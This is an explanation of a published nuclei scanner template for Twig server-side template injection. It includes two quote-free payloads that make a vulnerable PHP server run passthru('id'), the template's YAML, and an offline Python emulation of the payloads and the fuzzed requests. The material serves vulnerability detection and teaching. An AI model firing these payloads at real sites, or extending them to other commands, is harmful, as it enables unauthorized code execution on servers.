Twig, the PHP template engine, is awkward to exploit under its default configuration because assembling the strings a payload needs (a function name and its argument) is hard without quoted string literals. The payload used here gets around that by nesting two built-in features: a `{% block U %}` holds the raw text `id000passthru`, and the built-in `_charset` global (`UTF-8` by default) supplies the block name through `_charset|first`, so `block(_charset|first)|split(000)` yields `["id", "", "", "passthru"]` without a single quote character (the literal `000` is the integer 0, which the `split` filter passes to PHP's `explode` as the delimiter `"0"`). `[x|first]|map(x|last)` then invokes `passthru("id")`, and the `id` output in the response is what the matcher looks for. The second payload in the template uses no block at all: with `strict_variables` off (the default) the bare names `id` and `passthru` are undefined variables that render as empty strings, while `_context|join` reproduces the injected input itself whenever the tainted parameter is the first value in the template context, so `slice(2,2)` and `slice(5,8)` carve `id` and `passthru` out of the payload's own text. Both payloads depend on Twig's `map` filter accepting a plain function name as its callable; where it does not, nothing executes and the template simply reports no match. In the nuclei template, `skip-variables-check: true` is needed because the payloads themselves contain `{{ ... }}`, which nuclei would otherwise treat as unresolved template variables, and `mode: single` replaces one query parameter per request.
PoC code [published]
id: twig-ssti

info:
  name: Twig - Server Side Template Injection
  author: ritikchaddha
  severity: high
  description: |
    Twig, a PHP template engine, posed significant challenges in crafting a working payload due to its built-in and default configurations, particularly in string creation. However, by utilizing the block feature and the built-in _charset variable, the attacker successfully developed a payload by nesting these elements together.
  reference:
    - https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation
  metadata:
    max-request: 1
  tags: twig,ssti,dast,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      injection:
        - "{%block%20U%}id000passthru{%endblock%}{%set%20x=block(_charset%7Cfirst)%7Csplit(000)%}{{[x%7Cfirst]%7Cmap(x%7Clast)%7Cjoin}}"
        - "{{id~passthru~_context%7Cjoin%7Cslice(2,2)%7Csplit(000)%7Cmap(_context%7Cjoin%7Cslice(5,8))}}"

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{injection}}"

    skip-variables-check: true

    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 4a0a0047304502203df49907603c316f0f529b945a7172647945eae6b34778b12d061bc04881f02a022100918e3630ae50e5face04ff0943a357b3af2fcbc228c2dc1c3c9ac5e2579281cc:922c64590222798bb761d5b6d8e72950
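As an added, offline illustration of the payload construction described above and of what the template actually sends and checks (this is example code, not part of the nuclei template, of nuclei, or of Twig), the following Python script decodes the two payloads and mimics the Twig string operations that assemble `passthru` and `id` without quotes, enumerates the requests nuclei issues for the `part: query` / `type: replace` / `mode: single` fuzzing block, and applies the template's regex matcher to sample response bodies. The target URL, parameter names and response bodies are constructed for the example; the `_context|join` emulation assumes, as the second payload does, that the injected value is the first value in the template context.

```python
"""Added example (not part of the nuclei template or of Twig): emulate the
Twig SSTI template above offline. It decodes the two payloads, mimics the
Twig string operations that assemble 'passthru' and 'id' without quotes,
enumerates the requests nuclei sends for part: query / type: replace /
mode: single, and applies the template's regex matcher to sample bodies."""
import re
from urllib.parse import parse_qsl, unquote, urlencode, urlsplit, urlunsplit

# The two payloads exactly as they appear in the template (already URL-encoded).
PAYLOADS = [
    "{%block%20U%}id000passthru{%endblock%}"
    "{%set%20x=block(_charset%7Cfirst)%7Csplit(000)%}"
    "{{[x%7Cfirst]%7Cmap(x%7Clast)%7Cjoin}}",
    "{{id~passthru~_context%7Cjoin%7Cslice(2,2)%7Csplit(000)"
    "%7Cmap(_context%7Cjoin%7Cslice(5,8))}}",
]

# The template's matcher: output of `id` somewhere in the body.
MATCHER = re.compile(r"uid=[0-9]+.*gid=[0-9]+.*")


def decode(payload):
    """Return the payload as Twig sees it once the web server URL-decodes it."""
    return unquote(payload)


def emulate_block_payload(charset="UTF-8"):
    """Mimic payload 1. The block named U holds 'id000passthru'; _charset|first
    ('U' for the default UTF-8 charset) names the block; the numeric literal
    000 is the integer 0, which Twig's split filter hands to PHP explode as the
    delimiter "0". x|first and x|last are then the argument and the function."""
    blocks = {"U": "id000passthru"}
    block_name = charset[0]              # _charset|first
    x = blocks[block_name].split("0")    # block(...)|split(000)
    return x[0], x[-1]                   # (x|first, x|last) -> ("id", "passthru")


def emulate_context_payload(context_values):
    """Mimic payload 2. With strict_variables off, the bare names id and
    passthru are undefined and render as empty strings; the real strings come
    from _context|join, which reproduces the injected text when the tainted
    parameter is the first value in the template context (assumption of the
    payload). slice(2,2) then yields 'id' and slice(5,8) yields 'passthru'."""
    joined = "".join(str(v) for v in context_values)   # _context|join
    argument = joined[2:4]                              # |slice(2,2)
    function = joined[5:13]                             # |slice(5,8)
    return argument, function


def fuzz_requests(url, payloads=PAYLOADS):
    """Enumerate the GET requests for `part: query, type: replace, mode: single`:
    each query parameter is replaced by each payload, one parameter at a time,
    with the remaining parameters left untouched. The payloads are spliced in
    verbatim because the template already URL-encodes them."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    requests = []
    for i in range(len(params)):
        for payload in payloads:
            query = "&".join(
                f"{key}={payload}" if j == i else urlencode([(key, value)])
                for j, (key, value) in enumerate(params)
            )
            requests.append(urlunsplit((parts.scheme, parts.netloc, parts.path, query, "")))
    return requests


def is_vulnerable(body):
    """Apply the template's body matcher to one response body."""
    return MATCHER.search(body) is not None


# Constructed sample responses, not captured from any real target.
SAMPLE_HIT = "<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)</pre>"
SAMPLE_MISS = "<h1>Hello {%block U%}id000passthru{%endblock%}</h1>"  # reflected, not evaluated


if __name__ == "__main__":
    print(decode(PAYLOADS[0]))
    print(emulate_block_payload())                          # ('id', 'passthru')
    print(emulate_context_payload([decode(PAYLOADS[1])]))   # ('id', 'passthru')
    for r in fuzz_requests("http://target.test/page?name=bob&lang=en"):
        print(r)
    print(is_vulnerable(SAMPLE_HIT), is_vulnerable(SAMPLE_MISS))  # True False
```

Two points worth noting from running it: with two query parameters and two payloads the template issues four requests, not one, so the `max-request: 1` metadata counts the template's request definitions rather than the fuzzed volume; and the matcher only fires when the command output is reflected in the body, so a target that evaluates the template but does not echo the result (or renders it elsewhere) is reported as clean.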